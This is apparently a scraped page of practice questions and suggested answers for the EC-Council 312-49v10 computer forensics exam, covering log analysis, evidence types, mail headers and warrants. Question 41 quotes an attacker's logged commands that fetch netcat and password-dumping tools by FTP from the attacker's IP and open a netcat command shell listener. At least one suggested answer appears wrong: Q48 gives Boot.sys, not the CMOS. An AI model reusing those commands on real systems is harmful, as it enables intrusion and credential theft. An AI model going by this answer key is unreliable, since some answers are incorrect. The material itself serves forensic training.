
ECCouncil 312-49v10 Practice Test - Questions Answers, Page 5

List of questions

Question 41

The following excerpt is taken from a honeypot log that was hosted at lab.wiretrip.net. Snort reported Unicode attacks from 213.116.251.162. The File Permission Canonicalization vulnerability (UNICODE attack) allows scripts to be run in arbitrary folders that do not normally have the right to run scripts. The attacker tries a Unicode attack and eventually succeeds in displaying boot.ini.

He then switches to playing with RDS, via msadcs.dll. The RDS vulnerability allows a malicious user to construct SQL statements that will execute shell commands (such as CMD.EXE) on the IIS server. He does a quick query to discover that the directory exists, and a query to msadcs.dll shows that it is functioning correctly. The attacker makes an RDS query which results in the commands run as shown below.

"cmd1.exe /c open 213.116.251.162 >ftpcom"

"cmd1.exe /c echo johna2k >>ftpcom"

"cmd1.exe /c echo haxedj00 >>ftpcom"

"cmd1.exe /c echo get nc.exe >>ftpcom"

"cmd1.exe /c echo get pdump.exe >>ftpcom"

"cmd1.exe /c echo get samdump.dll >>ftpcom"

"cmd1.exe /c echo quit >>ftpcom"

"cmd1.exe /c ftp -s:ftpcom"

"cmd1.exe /c nc -l -p 6969 -e cmd1.exe"

What can you infer from the exploit given?

A. It is a local exploit where the attacker logs in using username johna2k
B. There are two attackers on the system - johna2k and haxedj00
C. The attack is a remote exploit and the hacker downloads three files
D. The attacker is unsuccessful in spawning a shell as he has specified a high end UDP port

Suggested answer: C

Explanation:

The log clearly indicates that this is a remote exploit with three files being downloaded and hence the correct answer is C.

asked 18/09/2024 by Sam Poon

Question 42

What term is used to describe a cryptographic technique for embedding information into something else for the sole purpose of hiding that information from the casual observer?

A. rootkit
B. key escrow
C. steganography
D. Offset

Suggested answer: C

asked 18/09/2024 by Arnaud DUTEL

Question 43

During the course of an investigation, you locate evidence that may prove the innocence of the suspect of the investigation. You must maintain an unbiased opinion and be objective in your entire fact-finding process. Therefore, you report this evidence. This type of evidence is known as:

A. Inculpatory evidence
B. Mandatory evidence
C. Exculpatory evidence
D. Terrible evidence

Suggested answer: C

asked 18/09/2024 by EduBP srl De Sanctis

Question 44

If you discover a criminal act while investigating a corporate policy abuse, it becomes a public-sector investigation and should be referred to law enforcement?

A. true
B. false

Suggested answer: A

asked 18/09/2024 by Ramakrishnan Subramanian

Question 45

What binary coding is used most often for e-mail purposes?

A. MIME
B. Uuencode
C. IMAP
D. SMTP

Suggested answer: A

asked 18/09/2024 by Adrian Petrisoaia

Question 46

If you see the files Zer0.tar.gz and copy.tar.gz on a Linux system while doing an investigation, what can you conclude?

A. The system files have been copied by a remote attacker
B. The system administrator has created an incremental backup
C. The system has been compromised using a t0rn rootkit
D. Nothing in particular as these can be operational files

Suggested answer: D

asked 18/09/2024 by Babak Sadeghpour

Question 47

From the following spam mail header, identify the host IP that sent this spam.

From [email protected] [email protected] Tue Nov 27 17:27:11 2001
Received: from viruswall.ie.cuhk.edu.hk (viruswall [137.189.96.52]) by eng.ie.cuhk.edu.hk (8.11.6/8.11.6) with ESMTP id fAR9RAP23061 for ; Tue, 27 Nov 2001 17:27:10 +0800 (HKT)
Received: from mydomain.com (pcd249020.netvigator.com [203.218.39.20]) by viruswall.ie.cuhk.edu.hk (8.12.1/8.12.1) with SMTP id fAR9QXwZ018431 for ; Tue, 27 Nov 2001 17:26:36 +0800 (HKT)
Message-Id: >[email protected]
From: "china hotel web"
To: "Shlam"
Subject: SHANGHAI (HILTON HOTEL) PACKAGE
Date: Tue, 27 Nov 2001 17:25:58 +0800
MIME-Version: 1.0
X-Priority: 3
X-MSMail-Priority: Normal
Reply-To: "china hotel web"

A. 137.189.96.52
B. 8.12.1.0
C. 203.218.39.20
D. 203.218.39.50

Suggested answer: C

asked 18/09/2024 by Madhankumar Rathinakumar

Question 48

If you plan to startup a suspect's computer, you must modify the ___________ to ensure that you do not contaminate or alter data on the suspect's hard drive by booting to the hard drive.

A. deltree command
B. CMOS
C. Boot.sys
D. Scandisk utility

Suggested answer: C

asked 18/09/2024 by Pang Guo Ming

Question 49

You are working for a local police department that services a population of 1,000,000 people and you have been given the task of building a computer forensics lab. How many law-enforcement computer investigators should you request to staff the lab?

A. 8
B. 1
C. 4
D. 2

Suggested answer: C

asked 18/09/2024 by Jason Evans

Question 50

When obtaining a warrant, it is important to:

A. particularly describe the place to be searched and particularly describe the items to be seized
B. generally describe the place to be searched and particularly describe the items to be seized
C. generally describe the place to be searched and generally describe the items to be seized
D. particularly describe the place to be searched and generally describe the items to be seized

Suggested answer: A

asked 18/09/2024 by Paulo Cury